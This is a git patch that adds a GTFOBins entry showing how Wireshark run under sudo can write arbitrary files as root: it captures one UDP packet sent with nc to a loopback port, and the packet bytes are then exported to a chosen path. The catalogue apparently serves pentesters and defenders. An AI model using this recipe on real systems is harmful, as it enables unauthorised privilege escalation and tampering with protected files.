From 74e021e8ef124030878bc3671e675411cdaf5c1a Mon Sep 17 00:00:00 2001
From: Gauthier Sebaux <zeronounours@users.noreply.github.com>
Date: Thu, 27 Jan 2022 14:53:26 +0100
Subject: [PATCH] Add wireshark sudo file write

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/wireshark.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 _gtfobins/wireshark.md

diff --git a/_gtfobins/wireshark.md b/_gtfobins/wireshark.md
new file mode 100644
index 0000000..55cfc9f
--- /dev/null
+++ b/_gtfobins/wireshark.md
@@ -0,0 +1,18 @@
+---
+functions:
+  sudo:
+    - description: |
+        This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.
+
+        After starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:
+
+        1. select the only received packet;
+
+        2. right-click on "Data" from the "Packet Details" pane, and select "Export Packet Bytes...";
+
+        3. choose where to save the packet dump.
+      code: |
+        PORT=4444
+        sudo wireshark -c 1 -i lo -k -f "udp port $PORT" &
+        echo 'DATA' | nc -u 127.127.127.127 "$PORT"
+---